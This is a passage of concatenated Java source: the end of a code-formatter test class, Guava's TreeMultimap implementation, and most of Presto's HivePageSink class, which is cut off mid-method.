String source = unformattedCode("@SuppressWarnings( value= \"name\" )val xxx:int=45");
String expected = formattedCode(" @SuppressWarnings(value = \"name\") val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void annotationImplicitValue() throws Exception {
String source = unformattedCode("@SuppressWarnings( \"name\" )val xxx:int=45");
String expected = formattedCode(" @SuppressWarnings(\"name\") val xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment1() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"* That's the second line.",
"*/val xxx:int=45"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment2() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"That's the second line.*/val xxx:int=45"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment3() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"That's the second line.*/val xxx:int=45 /*Second comment.*/val yyy:int"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45",
"\t/* Second comment.",
"\t */",
"\tval yyy : int");
assertFormatted(source, expected);
}
@Test
public void mlStandardComment4() throws Exception {
String source = unformattedCode(multilineString(
"/*Hello world.",
"That's the second line.*/val xxx:int=45/*Second comment.*/"));
String expected = formattedCode(
"\t/* Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45",
"\t/* Second comment.",
"\t */");
assertFormatted(source, expected);
}
@Test
public void mlJavaComment() throws Exception {
String source = unformattedCode(multilineString(
"/**Hello world.",
"That's the second line.*/val xxx:int=45"));
String expected = formattedCode(
"\t/** Hello world.",
"\t * That's the second line.",
"\t */",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment1() throws Exception {
String source = unformattedCode(multilineString(
"",
"//Hello world.",
"val xxx:int=45"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment2() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment3() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45");
assertFormatted(source, expected);
}
@Test
public void slComment4() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45",
"//Second comment",
""));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45",
"\t// Second comment");
assertFormatted(source, expected);
}
@Test
public void slComment5() throws Exception {
String source = unformattedCode(multilineString(
"",
"// Hello world.",
"val xxx:int=45",
"//Second comment",
"val yyy:int=67"));
String expected = formattedCode(
"\t// Hello world.",
"\tval xxx : int = 45",
"\t// Second comment",
"\tval yyy : int = 67");
assertFormatted(source, expected);
}
}
}
|
|
/*
* Copyright (C) 2007 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.base.Preconditions.checkNotNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.Collection;
import java.util.Comparator;
import java.util.NavigableMap;
import java.util.NavigableSet;
import java.util.SortedSet;
import java.util.TreeMap;
import java.util.TreeSet;
import javax.annotation.Nullable;
/**
* Implementation of {@code Multimap} whose keys and values are ordered by
* their natural ordering or by supplied comparators. In all cases, this
* implementation uses {@link Comparable#compareTo} or {@link
* Comparator#compare} instead of {@link Object#equals} to determine
* equivalence of instances.
*
* <p><b>Warning:</b> The comparators or comparables used must be <i>consistent
* with equals</i> as explained by the {@link Comparable} class specification.
* Otherwise, the resulting multiset will violate the general contract of {@link
* SetMultimap}, which it is specified in terms of {@link Object#equals}.
*
* <p>The collections returned by {@code keySet} and {@code asMap} iterate
* through the keys according to the key comparator ordering or the natural
* ordering of the keys. Similarly, {@code get}, {@code removeAll}, and {@code
* replaceValues} return collections that iterate through the values according
* to the value comparator ordering or the natural ordering of the values. The
* collections generated by {@code entries}, {@code keys}, and {@code values}
* iterate across the keys according to the above key ordering, and for each
* key they iterate across the values according to the value ordering.
*
* <p>The multimap does not store duplicate key-value pairs. Adding a new
* key-value pair equal to an existing key-value pair has no effect.
*
* <p>Null keys and values are permitted (provided, of course, that the
* respective comparators support them). All optional multimap methods are
* supported, and all returned views are modifiable.
*
* <p>This class is not threadsafe when any concurrent operations update the
* multimap. Concurrent read operations will work correctly. To allow concurrent
* update operations, wrap your multimap with a call to {@link
* Multimaps#synchronizedSortedSetMultimap}.
*
* <p>See the Guava User Guide article on <a href=
* "http://code.google.com/p/guava-libraries/wiki/NewCollectionTypesExplained#Multimap">
* {@code Multimap}</a>.
*
* @author Jared Levy
* @author Louis Wasserman
* @since 2.0
*/
@GwtCompatible(serializable = true, emulated = true)
public class TreeMultimap<K, V> extends AbstractSortedKeySortedSetMultimap<K, V> {
private transient Comparator<? super K> keyComparator;
private transient Comparator<? super V> valueComparator;
/**
* Creates an empty {@code TreeMultimap} ordered by the natural ordering of
* its keys and values.
*/
public static <K extends Comparable, V extends Comparable>
TreeMultimap<K, V> create() {
return new TreeMultimap<K, V>(Ordering.natural(), Ordering.natural());
}
/**
* Creates an empty {@code TreeMultimap} instance using explicit comparators.
* Neither comparator may be null; use {@link Ordering#natural()} to specify
* natural order.
*
* @param keyComparator the comparator that determines the key ordering
* @param valueComparator the comparator that determines the value ordering
*/
public static <K, V> TreeMultimap<K, V> create(
Comparator<? super K> keyComparator,
Comparator<? super V> valueComparator) {
return new TreeMultimap<K, V>(checkNotNull(keyComparator),
checkNotNull(valueComparator));
}
/**
* Constructs a {@code TreeMultimap}, ordered by the natural ordering of its
* keys and values, with the same mappings as the specified multimap.
*
* @param multimap the multimap whose contents are copied to this multimap
*/
public static <K extends Comparable, V extends Comparable>
TreeMultimap<K, V> create(Multimap<? extends K, ? extends V> multimap) {
return new TreeMultimap<K, V>(Ordering.natural(), Ordering.natural(),
multimap);
}
TreeMultimap(Comparator<? super K> keyComparator,
Comparator<? super V> valueComparator) {
super(new TreeMap<K, Collection<V>>(keyComparator));
this.keyComparator = keyComparator;
this.valueComparator = valueComparator;
}
private TreeMultimap(Comparator<? super K> keyComparator,
Comparator<? super V> valueComparator,
Multimap<? extends K, ? extends V> multimap) {
this(keyComparator, valueComparator);
putAll(multimap);
}
/**
* {@inheritDoc}
*
* <p>Creates an empty {@code TreeSet} for a collection of values for one key.
*
* @return a new {@code TreeSet} containing a collection of values for one
* key
*/
@Override SortedSet<V> createCollection() {
return new TreeSet<V>(valueComparator);
}
@Override
Collection<V> createCollection(@Nullable K key) {
if (key == null) {
keyComparator().compare(key, key);
}
return super.createCollection(key);
}
/**
* Returns the comparator that orders the multimap keys.
*/
public Comparator<? super K> keyComparator() {
return keyComparator;
}
@Override
public Comparator<? super V> valueComparator() {
return valueComparator;
}
/*
* The following @GwtIncompatible methods override the methods in
* AbstractSortedKeySortedSetMultimap, so GWT will fall back to the ASKSSM implementations,
* which return SortedSets and SortedMaps.
*/
@Override
@GwtIncompatible("NavigableMap")
NavigableMap<K, Collection<V>> backingMap() {
return (NavigableMap<K, Collection<V>>) super.backingMap();
}
/**
* @since 14.0 (present with return type {@code SortedSet} since 2.0)
*/
@Override
@GwtIncompatible("NavigableSet")
public NavigableSet<V> get(@Nullable K key) {
return (NavigableSet<V>) super.get(key);
}
@Override
@GwtIncompatible("NavigableSet")
Collection<V> unmodifiableCollectionSubclass(Collection<V> collection) {
return Sets.unmodifiableNavigableSet((NavigableSet<V>) collection);
}
@Override
@GwtIncompatible("NavigableSet")
Collection<V> wrapCollection(K key, Collection<V> collection) {
return new WrappedNavigableSet(key, (NavigableSet<V>) collection, null);
}
/**
* {@inheritDoc}
*
* <p>Because a {@code TreeMultimap} has unique sorted keys, this method
* returns a {@link NavigableSet}, instead of the {@link java.util.Set} specified
* in the {@link Multimap} interface.
*
* @since 14.0 (present with return type {@code SortedSet} since 2.0)
*/
@Override
@GwtIncompatible("NavigableSet")
public NavigableSet<K> keySet() {
return (NavigableSet<K>) super.keySet();
}
@Override
@GwtIncompatible("NavigableSet")
NavigableSet<K> createKeySet() {
return new NavigableKeySet(backingMap());
}
/**
* {@inheritDoc}
*
* <p>Because a {@code TreeMultimap} has unique sorted keys, this method
* returns a {@link NavigableMap}, instead of the {@link java.util.Map} specified
* in the {@link Multimap} interface.
*
* @since 14.0 (present with return type {@code SortedMap} since 2.0)
*/
@Override
@GwtIncompatible("NavigableMap")
public NavigableMap<K, Collection<V>> asMap() {
return (NavigableMap<K, Collection<V>>) super.asMap();
}
@Override
@GwtIncompatible("NavigableMap")
NavigableMap<K, Collection<V>> createAsMap() {
return new NavigableAsMap(backingMap());
}
/**
* @serialData key comparator, value comparator, number of distinct keys, and
* then for each distinct key: the key, number of values for that key, and
* key values
*/
@GwtIncompatible("java.io.ObjectOutputStream")
private void writeObject(ObjectOutputStream stream) throws IOException {
stream.defaultWriteObject();
stream.writeObject(keyComparator());
stream.writeObject(valueComparator());
Serialization.writeMultimap(this, stream);
}
@GwtIncompatible("java.io.ObjectInputStream")
@SuppressWarnings("unchecked") // reading data stored by writeObject
private void readObject(ObjectInputStream stream)
throws IOException, ClassNotFoundException {
stream.defaultReadObject();
keyComparator = checkNotNull((Comparator<? super K>) stream.readObject());
valueComparator = checkNotNull((Comparator<? super V>) stream.readObject());
setMap(new TreeMap<K, Collection<V>>(keyComparator));
Serialization.populateMultimap(this, stream);
}
@GwtIncompatible("not needed in emulated source")
private static final long serialVersionUID = 0;
}
|
|
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.presto.hive;
import com.facebook.presto.hive.HiveWriteUtils.FieldSetter;
import com.facebook.presto.hive.metastore.HivePageSinkMetadataProvider;
import com.facebook.presto.hive.metastore.Partition;
import com.facebook.presto.hive.metastore.StorageFormat;
import com.facebook.presto.hive.metastore.Table;
import com.facebook.presto.spi.ConnectorPageSink;
import com.facebook.presto.spi.ConnectorSession;
import com.facebook.presto.spi.Page;
import com.facebook.presto.spi.PageIndexer;
import com.facebook.presto.spi.PageIndexerFactory;
import com.facebook.presto.spi.PrestoException;
import com.facebook.presto.spi.block.Block;
import com.facebook.presto.spi.type.Type;
import com.facebook.presto.spi.type.TypeManager;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Splitter;
import com.google.common.base.Strings;
import com.google.common.base.Throwables;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.Sets;
import com.google.common.primitives.Ints;
import io.airlift.json.JsonCodec;
import io.airlift.slice.Slice;
import it.unimi.dsi.fastutil.ints.Int2ObjectMap;
import it.unimi.dsi.fastutil.ints.Int2ObjectOpenHashMap;
import it.unimi.dsi.fastutil.objects.Object2IntMap;
import it.unimi.dsi.fastutil.objects.Object2IntOpenHashMap;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hive.common.FileUtils;
import org.apache.hadoop.hive.conf.HiveConf;
import org.apache.hadoop.hive.ql.exec.FileSinkOperator.RecordWriter;
import org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat;
import org.apache.hadoop.hive.serde2.SerDeException;
import org.apache.hadoop.hive.serde2.Serializer;
import org.apache.hadoop.hive.serde2.columnar.OptimizedLazyBinaryColumnarSerde;
import org.apache.hadoop.hive.serde2.objectinspector.SettableStructObjectInspector;
import org.apache.hadoop.hive.serde2.objectinspector.StructField;
import org.apache.hadoop.hive.serde2.typeinfo.TypeInfo;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.io.compress.DefaultCodec;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hive.common.util.ReflectionUtil;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.OptionalInt;
import java.util.Properties;
import java.util.Set;
import java.util.concurrent.CompletableFuture;
import java.util.stream.Collectors;
import static com.facebook.presto.hive.HiveColumnHandle.SAMPLE_WEIGHT_COLUMN_NAME;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_INVALID_METADATA;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_PARTITION_READ_ONLY;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_PARTITION_SCHEMA_MISMATCH;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_PATH_ALREADY_EXISTS;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_TOO_MANY_OPEN_PARTITIONS;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_UNSUPPORTED_FORMAT;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_WRITER_CLOSE_ERROR;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_WRITER_DATA_ERROR;
import static com.facebook.presto.hive.HivePartitionKey.HIVE_DEFAULT_DYNAMIC_PARTITION;
import static com.facebook.presto.hive.HiveType.toHiveTypes;
import static com.facebook.presto.hive.HiveWriteUtils.createFieldSetter;
import static com.facebook.presto.hive.HiveWriteUtils.getField;
import static com.facebook.presto.hive.HiveWriteUtils.getRowColumnInspectors;
import static com.facebook.presto.hive.metastore.MetastoreUtil.getHiveSchema;
import static com.facebook.presto.spi.StandardErrorCode.NOT_FOUND;
import static com.google.common.base.MoreObjects.toStringHelper;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Verify.verify;
import static io.airlift.slice.Slices.wrappedBuffer;
import static java.lang.String.format;
import static java.util.Objects.requireNonNull;
import static java.util.UUID.randomUUID;
import static java.util.function.Function.identity;
import static java.util.stream.Collectors.joining;
import static java.util.stream.Collectors.toList;
import static java.util.stream.Collectors.toMap;
import static org.apache.hadoop.hive.conf.HiveConf.ConfVars.COMPRESSRESULT;
import static org.apache.hadoop.hive.metastore.api.hive_metastoreConstants.META_TABLE_COLUMNS;
import static org.apache.hadoop.hive.metastore.api.hive_metastoreConstants.META_TABLE_COLUMN_TYPES;
import static org.apache.hadoop.hive.serde2.objectinspector.ObjectInspectorFactory.getStandardStructObjectInspector;
public class HivePageSink
implements ConnectorPageSink
{
private static final int MAX_BUCKET_COUNT = 100000;
private static final int BUCKET_NUMBER_PADDING = Integer.toString(MAX_BUCKET_COUNT - 1).length();
private final String schemaName;
private final String tableName;
private final int[] dataColumnInputIndex; // ordinal of columns (not counting sample weight column)
private final List<DataColumn> dataColumns;
private final int[] partitionColumnsInputIndex; // ordinal of columns (not counting sample weight column)
private final List<String> partitionColumnNames;
private final List<Type> partitionColumnTypes;
private final OptionalInt bucketCount;
private final int[] bucketColumns;
private final List<TypeInfo> bucketColumnTypes;
private final HiveStorageFormat tableStorageFormat;
private final HiveStorageFormat partitionStorageFormat;
private final LocationHandle locationHandle;
private final LocationService locationService;
private final String filePrefix;
private final HivePageSinkMetadataProvider pageSinkMetadataProvider;
private final PageIndexer pageIndexer;
private final TypeManager typeManager;
private final HdfsEnvironment hdfsEnvironment;
private final JobConf conf;
private final int maxOpenPartitions;
private final JsonCodec<PartitionUpdate> partitionUpdateCodec;
private final List<Object> partitionRow;
private final Table table;
private final boolean immutablePartitions;
private final boolean compress;
private HiveRecordWriter[] writers;
private final List<Int2ObjectMap<HiveRecordWriter>> bucketWriters;
private int bucketWriterCount = 0;
private final ConnectorSession session;
public HivePageSink(
String schemaName,
String tableName,
boolean isCreateTable,
List<HiveColumnHandle> inputColumns,
HiveStorageFormat tableStorageFormat,
HiveStorageFormat partitionStorageFormat,
LocationHandle locationHandle,
LocationService locationService,
String filePrefix,
Optional<HiveBucketProperty> bucketProperty,
HivePageSinkMetadataProvider pageSinkMetadataProvider,
PageIndexerFactory pageIndexerFactory,
TypeManager typeManager,
HdfsEnvironment hdfsEnvironment,
int maxOpenPartitions,
boolean immutablePartitions,
boolean compress,
JsonCodec<PartitionUpdate> partitionUpdateCodec,
ConnectorSession session)
{
this.schemaName = requireNonNull(schemaName, "schemaName is null");
this.tableName = requireNonNull(tableName, "tableName is null");
requireNonNull(inputColumns, "inputColumns is null");
this.tableStorageFormat = requireNonNull(tableStorageFormat, "tableStorageFormat is null");
this.partitionStorageFormat = requireNonNull(partitionStorageFormat, "partitionStorageFormat is null");
this.locationHandle = requireNonNull(locationHandle, "locationHandle is null");
this.locationService = requireNonNull(locationService, "locationService is null");
this.filePrefix = requireNonNull(filePrefix, "filePrefix is null");
this.pageSinkMetadataProvider = requireNonNull(pageSinkMetadataProvider, "pageSinkMetadataProvider is null");
requireNonNull(pageIndexerFactory, "pageIndexerFactory is null");
this.typeManager = requireNonNull(typeManager, "typeManager is null");
this.hdfsEnvironment = requireNonNull(hdfsEnvironment, "hdfsEnvironment is null");
this.maxOpenPartitions = maxOpenPartitions;
this.immutablePartitions = immutablePartitions;
this.compress = compress;
this.partitionUpdateCodec = requireNonNull(partitionUpdateCodec, "partitionUpdateCodec is null");
// divide input columns into partition and data columns
ImmutableList.Builder<String> partitionColumnNames = ImmutableList.builder();
ImmutableList.Builder<Type> partitionColumnTypes = ImmutableList.builder();
ImmutableList.Builder<DataColumn> dataColumns = ImmutableList.builder();
for (HiveColumnHandle column : inputColumns) {
if (column.isPartitionKey()) {
partitionColumnNames.add(column.getName());
partitionColumnTypes.add(typeManager.getType(column.getTypeSignature()));
}
else {
dataColumns.add(new DataColumn(column.getName(), typeManager.getType(column.getTypeSignature()), column.getHiveType()));
}
}
this.partitionColumnNames = partitionColumnNames.build();
this.partitionColumnTypes = partitionColumnTypes.build();
this.dataColumns = dataColumns.build();
// determine the input index of the partition columns and data columns
// and determine the input index and type of bucketing columns
ImmutableList.Builder<Integer> partitionColumns = ImmutableList.builder();
ImmutableList.Builder<Integer> dataColumnsInputIndex = ImmutableList.builder();
Object2IntMap<String> dataColumnNameToIdMap = new Object2IntOpenHashMap<>();
Map<String, HiveType> dataColumnNameToTypeMap = new HashMap<>();
// sample weight column is passed separately, so index must be calculated without this column
List<HiveColumnHandle> inputColumnsWithoutSample = inputColumns.stream()
.filter(column -> !column.getName().equals(SAMPLE_WEIGHT_COLUMN_NAME))
.collect(toList());
for (int inputIndex = 0; inputIndex < inputColumnsWithoutSample.size(); inputIndex++) {
HiveColumnHandle column = inputColumnsWithoutSample.get(inputIndex);
if (column.isPartitionKey()) {
partitionColumns.add(inputIndex);
}
else {
dataColumnsInputIndex.add(inputIndex);
dataColumnNameToIdMap.put(column.getName(), inputIndex);
dataColumnNameToTypeMap.put(column.getName(), column.getHiveType());
}
}
this.partitionColumnsInputIndex = Ints.toArray(partitionColumns.build());
this.dataColumnInputIndex = Ints.toArray(dataColumnsInputIndex.build());
requireNonNull(bucketProperty, "bucketProperty is null");
if (bucketProperty.isPresent()) {
int bucketCount = bucketProperty.get().getBucketCount();
checkArgument(bucketCount < MAX_BUCKET_COUNT, "bucketCount must be smaller than 100000");
this.bucketCount = OptionalInt.of(bucketCount);
this.bucketColumns = bucketProperty.get().getBucketedBy().stream()
.mapToInt(dataColumnNameToIdMap::get)
.toArray();
this.bucketColumnTypes = bucketProperty.get().getBucketedBy().stream()
.map(dataColumnNameToTypeMap::get)
.map(HiveType::getTypeInfo)
.collect(Collectors.toList());
bucketWriters = new ArrayList<>();
}
else {
this.bucketCount = OptionalInt.empty();
this.bucketColumns = null;
this.bucketColumnTypes = null;
bucketWriters = null;
writers = new HiveRecordWriter[0];
}
this.pageIndexer = pageIndexerFactory.createPageIndexer(this.partitionColumnTypes);
// preallocate temp space for partition and data
this.partitionRow = Arrays.asList(new Object[this.partitionColumnNames.size()]);
if (isCreateTable) {
this.table = null;
Optional<Path> writePath = locationService.writePathRoot(locationHandle);
checkArgument(writePath.isPresent(), "CREATE TABLE must have a write path");
conf = new JobConf(hdfsEnvironment.getConfiguration(writePath.get()));
}
else {
Optional<Table> table = pageSinkMetadataProvider.getTable();
if (!table.isPresent()) {
throw new PrestoException(HIVE_INVALID_METADATA, format("Table %s.%s was dropped during insert", schemaName, tableName));
}
this.table = table.get();
Path hdfsEnvironmentPath = locationService.writePathRoot(locationHandle).orElseGet(() -> locationService.targetPathRoot(locationHandle));
conf = new JobConf(hdfsEnvironment.getConfiguration(hdfsEnvironmentPath));
}
this.session = requireNonNull(session, "session is null");
}
@Override
public Collection<Slice> finish()
{
// Must be wrapped in doAs entirely
// Implicit FileSystem initializations are possible in HiveRecordWriter#commit -> RecordWriter#close
return hdfsEnvironment.doAs(session.getUser(), this::doFinish);
}
private ImmutableList<Slice> doFinish()
{
ImmutableList.Builder<Slice> partitionUpdates = ImmutableList.builder();
if (!bucketCount.isPresent()) {
for (HiveRecordWriter writer : writers) {
if (writer != null) {
writer.commit();
PartitionUpdate partitionUpdate = writer.getPartitionUpdate();
partitionUpdates.add(wrappedBuffer(partitionUpdateCodec.toJsonBytes(partitionUpdate)));
}
}
}
else {
for (Int2ObjectMap<HiveRecordWriter> writers : bucketWriters) {
PartitionUpdate firstPartitionUpdate = null;
ImmutableList.Builder<String> fileNamesBuilder = ImmutableList.builder();
for (HiveRecordWriter writer : writers.values()) {
writer.commit();
PartitionUpdate partitionUpdate = writer.getPartitionUpdate();
if (firstPartitionUpdate == null) {
firstPartitionUpdate = partitionUpdate;
}
else {
verify(firstPartitionUpdate.getName().equals(partitionUpdate.getName()));
verify(firstPartitionUpdate.isNew() == partitionUpdate.isNew());
verify(firstPartitionUpdate.getTargetPath().equals(partitionUpdate.getTargetPath()));
verify(firstPartitionUpdate.getWritePath().equals(partitionUpdate.getWritePath()));
}
fileNamesBuilder.addAll(partitionUpdate.getFileNames());
}
if (firstPartitionUpdate == null) {
continue;
}
partitionUpdates.add(wrappedBuffer(partitionUpdateCodec.toJsonBytes(new PartitionUpdate(
firstPartitionUpdate.getName(),
firstPartitionUpdate.isNew(),
firstPartitionUpdate.getWritePath(),
firstPartitionUpdate.getTargetPath(),
fileNamesBuilder.build()))));
}
}
return partitionUpdates.build();
}
@Override
public void abort()
{
// Must be wrapped in doAs entirely
// Implicit FileSystem initializations are possible in HiveRecordWriter#rollback -> RecordWriter#close
hdfsEnvironment.doAs(session.getUser(), this::doAbort);
}
private void doAbort()
{
if (!bucketCount.isPresent()) {
for (HiveRecordWriter writer : writers) {
if (writer != null) {
writer.rollback();
}
}
}
else {
for (Int2ObjectMap<HiveRecordWriter> writers : bucketWriters) {
for (HiveRecordWriter writer : writers.values()) {
writer.rollback();
}
}
}
}
@Override
public CompletableFuture<?> appendPage(Page page, Block sampleWeightBlock)
{
if (page.getPositionCount() == 0) {
return NOT_BLOCKED;
}
Block[] dataBlocks = getDataBlocks(page, sampleWeightBlock);
Block[] partitionBlocks = getPartitionBlocks(page);
int[] indexes = pageIndexer.indexPage(new Page(page.getPositionCount(), partitionBlocks));
if (pageIndexer.getMaxIndex() >= maxOpenPartitions) {
throw new PrestoException(HIVE_TOO_MANY_OPEN_PARTITIONS, "Too many open partitions");
}
// Must be wrapped in doAs entirely
// Implicit FileSystem initializations are possible in HiveRecordWriter#addRow or #createWriter
return hdfsEnvironment.doAs(session.getUser(), () -> doAppend(page, dataBlocks, partitionBlocks, indexes));
}
private CompletableFuture<?> doAppend(Page page, Block[] dataBlocks, Block[] partitionBlocks, int[] indexes)
{
if (!bucketCount.isPresent()) {
if (pageIndexer.getMaxIndex() >= writers.length) {
writers = Arrays.copyOf(writers, pageIndexer.getMaxIndex() + 1);
}
for (int position = 0; position < page.getPositionCount(); position++) {
int writerIndex = indexes[position];
HiveRecordWriter writer = writers[writerIndex];
if (writer == null) {
for (int field = 0; field < partitionBlocks.length; field++) {
Object value = getField(partitionColumnTypes.get(field), partitionBlocks[field], position);
partitionRow.set(field, value);
}
writer = createWriter(partitionRow, filePrefix + "_" + randomUUID());
writers[writerIndex] = writer;
}
writer.addRow(dataBlocks, position);
}
}
else {
int bucketCount = this.bucketCount.getAsInt();
Block[] bucketBlocks = new Block[bucketColumns.length];
for (int i = 0; i < bucketColumns.length; i++) {
bucketBlocks[i] = page.getBlock(bucketColumns[i]);
}
Page bucketColumnsPage = new Page(page.getPositionCount(), bucketBlocks);
for (int i = bucketWriters.size(); i <= pageIndexer.getMaxIndex(); i++) {
bucketWriters.add(new Int2ObjectOpenHashMap<>());
}
for (int position = 0; position < page.getPositionCount(); position++) {
int writerIndex = indexes[position];
Int2ObjectMap<HiveRecordWriter> writers = bucketWriters.get(writerIndex);
int bucket = HiveBucketing.getHiveBucket(bucketColumnTypes, bucketColumnsPage, position, bucketCount);
HiveRecordWriter writer = writers.get(bucket);
if (writer == null) {
if (bucketWriterCount >= maxOpenPartitions) {
throw new PrestoException(HIVE_TOO_MANY_OPEN_PARTITIONS, "Too many open writers for partitions and buckets");
}
bucketWriterCount++;
for (int field = 0; field < partitionBlocks.length; field++) {
Object value = getField(partitionColumnTypes.get(field), partitionBlocks[field], position);
partitionRow.set(field, value);
}
writer = createWriter(partitionRow, computeBucketedFileName(filePrefix, bucket));
writers.put(bucket, writer);
}
writer.addRow(dataBlocks, position);
}
}
return NOT_BLOCKED;
}
public static String computeBucketedFileName(String filePrefix, int bucket)
{
return filePrefix + "_bucket-" + Strings.padStart(Integer.toString(bucket), BUCKET_NUMBER_PADDING, '0');
}
private HiveRecordWriter createWriter(List<Object> partitionRow, String fileName)
{
checkArgument(partitionRow.size() == partitionColumnNames.size(), "size of partitionRow is different from partitionColumnNames");
List<String> partitionValues = partitionRow.stream()
.map(value -> (value == null) ? HIVE_DEFAULT_DYNAMIC_PARTITION : value.toString())
.collect(toList());
Optional<String> partitionName;
if (!partitionColumnNames.isEmpty()) {
partitionName = Optional.of(FileUtils.makePartName(partitionColumnNames, partitionValues));
}
else {
partitionName = Optional.empty();
}
// attempt to get the existing partition (if this is an existing partitioned table)
Optional<Partition> partition = Optional.empty();
if (!partitionRow.isEmpty() && table != null) {
partition = pageSinkMetadataProvider.getPartition(partitionValues);
}
boolean isNew;
Properties schema;
Path target;
Path write;
String outputFormat;
String serDe;
if (!partition.isPresent()) {
if (table == null) {
// Write to: a new partition in a new partitioned table,
// or a new unpartitioned table.
isNew = true;
schema = new Properties();
schema.setProperty(META_TABLE_COLUMNS, dataColumns.stream()
.map(DataColumn::getName)
.collect(joining(",")));
schema.setProperty(META_TABLE_COLUMN_TYPES, dataColumns.stream()
.map(DataColumn::getHiveType)
.map(HiveType::getHiveTypeName)
.collect(joining(":")));
target = locationService.targetPath(locationHandle, partitionName);
write = locationService.writePath(locationHandle, partitionName).get();
if (partitionName.isPresent() && !target.equals(write)) {
// When target path is different from write path,
// verify that the target directory for the partition does not already exist
if (HiveWriteUtils.pathExists(session.getUser(), hdfsEnvironment, target)) {
throw new PrestoException(HIVE_PATH_ALREADY_EXISTS, format("Target directory for new partition '%s' of table '%s.%s' already exists: %s",
partitionName,
schemaName,
tableName,
target));
}
}
}
else {
// Write to: a new partition in an existing partitioned table,
// or an existing unpartitioned table
if (partitionName.isPresent()) {
isNew = true;
}
else {
if (bucketCount.isPresent()) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Can not insert into bucketed unpartitioned Hive table");
}
if (immutablePartitions) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Unpartitioned Hive tables are immutable");
}
isNew = false;
}
schema = getHiveSchema(table);
target = locationService.targetPath(locationHandle, partitionName);
write = locationService.writePath(locationHandle, partitionName).orElse(target);
}
if (partitionName.isPresent()) {
// Write to a new partition
outputFormat = partitionStorageFormat.getOutputFormat();
serDe = partitionStorageFormat.getSerDe();
}
else {
// Write to a new/existing unpartitioned table
outputFormat = tableStorageFormat.getOutputFormat();
serDe = tableStorageFormat.getSerDe();
}
}
else {
// Write to: an existing partition in an existing partitioned table,
if (bucketCount.isPresent()) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Can not insert into existing partitions of bucketed Hive table");
}
if (immutablePartitions) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Hive partitions are immutable");
}
isNew = false;
// Append to an existing partition
HiveWriteUtils.checkPartitionIsWritable(partitionName.get(), partition.get());
StorageFormat storageFormat = partition.get().getStorage().getStorageFormat();
outputFormat = storageFormat.getOutputFormat();
serDe = storageFormat.getSerDe();
schema = getHiveSchema(partition.get(), table);
target = locationService.targetPath(locationHandle, partition.get(), partitionName.get());
write = locationService.writePath(locationHandle, partitionName).orElse(target);
}
return new HiveRecordWriter(
schemaName,
tableName,
partitionName.orElse(""),
compress,
isNew,
dataColumns,
outputFormat,
serDe,
schema,
fileName + getFileExtension(conf, outputFormat),
write.toString(),
target.toString(),
typeManager,
conf);
}
static String getFileExtension(JobConf conf, String outputFormat)
{
// text format files must have the correct extension when compressed
